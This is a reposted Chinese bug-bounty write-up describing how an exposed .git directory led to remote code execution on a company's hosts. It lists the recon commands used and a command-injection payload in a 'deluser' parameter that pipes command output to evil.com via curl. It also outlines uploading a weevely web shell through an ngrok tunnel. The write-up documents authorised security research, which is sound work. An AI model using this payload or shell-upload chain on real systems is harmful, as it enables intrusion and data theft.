记一次赏金10000美金的漏洞挖掘(从.git泄露到RCE)

admin 2023年2月28日15:16:51评论42 views字数 1457阅读4分51秒阅读模式

记一次赏金10000美金的漏洞挖掘(从.git泄露到RCE)

最近我参加了一个私人 bugbounty 计划,我设法通过四台主机上的开放 .git 目录找到了 RCE,为此我收到了创纪录的 10,000 美元,如果不分享它就是犯罪。

记一次赏金10000美金的漏洞挖掘(从.git泄露到RCE)

其实这个漏洞很简单,只用了半天时间,但大体上有条不紊……

收集容易发现的错误的主要阶段是信息收集,为此我在我的 bash 脚本中使用了一系列工具:

amass enum -active -d $1 -brute -w ~/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -o amass.txt
cat amass.txt | aquatone -ports xlarge -out aqua_$1
nuclei -l aqua_$1/aquatone_urls.txt -t ~/nuclei-templates -es info -o nuclei_$1.txt

这不是最详细的信息收集手段,你可以自行决定添加其他工具,但它旨在扫描大量主机

幸运的是, nuclei的输出显示了几个主机上暴露的 .git/ 目录,通过这些目录可以下载源代码

记一次赏金10000美金的漏洞挖掘(从.git泄露到RCE)

为此,请使用git-dumper工具:

git-dumper http://example.com/.git/ output

我认为这是在代码中寻找严重问题的好机会,并没有急于报告暴露的 .git 所以结果证明在代码中他们使用了对本地 bash 脚本的调用来通过 shell_exec 保存和删除 ftp用户()函数,它采用未经过滤的用户输入,这导致了 RCE 漏洞

为了验证测试请求包,我还必须考虑需要硬编码密钥的简单验证

记一次赏金10000美金的漏洞挖掘(从.git泄露到RCE)

以及请求的最终结果:

http://example.com/ftp-upload/sync.php?deluser=someuser&secret1=[secret1]&secret2=[sha1 encoded secret2]

入口点将是deluser参数

记一次赏金10000美金的漏洞挖掘(从.git泄露到RCE)

下一步是验证漏洞本身,为此我通过注入shell_exec()向我的服务器发出测试 curl 请求,该请求成功运行

记一次赏金10000美金的漏洞挖掘(从.git泄露到RCE)

也可以通过将命令发送到 URI 或通过 base64 编码形式的 POST 正文来读取命令的输出,如下所示:

id命令的payload:

someusr; curl https://evil.com/$(id|base64|tr -d “n”);

记一次赏金10000美金的漏洞挖掘(从.git泄露到RCE)

记一次赏金10000美金的漏洞挖掘(从.git泄露到RCE)

所以只剩下上传shell,唯一的障碍是对当前目录没有写权限,所以上传shell到uploads/ (生成shell,我用的是weevely工具)

记一次赏金10000美金的漏洞挖掘(从.git泄露到RCE)

如果按步骤描述这个过程:

将 shell 保存在本地 txt 中,以便能够通过 curl 传输它,并在自己的主机上启动服务器
用 ngrok 建立隧道
发送一个payload,将我们的 shell 保存在uploads/shell.php
使用weevely连接到上传的 shell

记一次赏金10000美金的漏洞挖掘(从.git泄露到RCE)

经过几天的帮助解决问题后,该公司奖励了我一笔赏金(附上赏金截图)

记一次赏金10000美金的漏洞挖掘(从.git泄露到RCE)

在10个案例中,有9个我没有收到任何东西,有不同的公司欺骗了我,这就是耐心和一致性

记一次赏金10000美金的漏洞挖掘(从.git泄露到RCE)


推荐阅读:


实战 | 记一次SSRF攻击内网的实战案例


实战 | 记两次应急响应小记


干货 | Wordpress网站渗透方法指南


实战 | 记一次CTF题引发的0day挖掘


2023年零基础+进阶系统化白帽黑客学习 | 2月份最新版


实战 | 记一次邮件系统C段引发的SQL手注和内网渗透


点赞,转发,在看


记一次赏金10000美金的漏洞挖掘(从.git泄露到RCE)

原文始发于微信公众号(HACK学习呀):记一次赏金10000美金的漏洞挖掘(从.git泄露到RCE)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月28日15:16:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次赏金10000美金的漏洞挖掘(从.git泄露到RCE)http://cn-sec.com/archives/1579544.html

发表评论

匿名网友 填写信息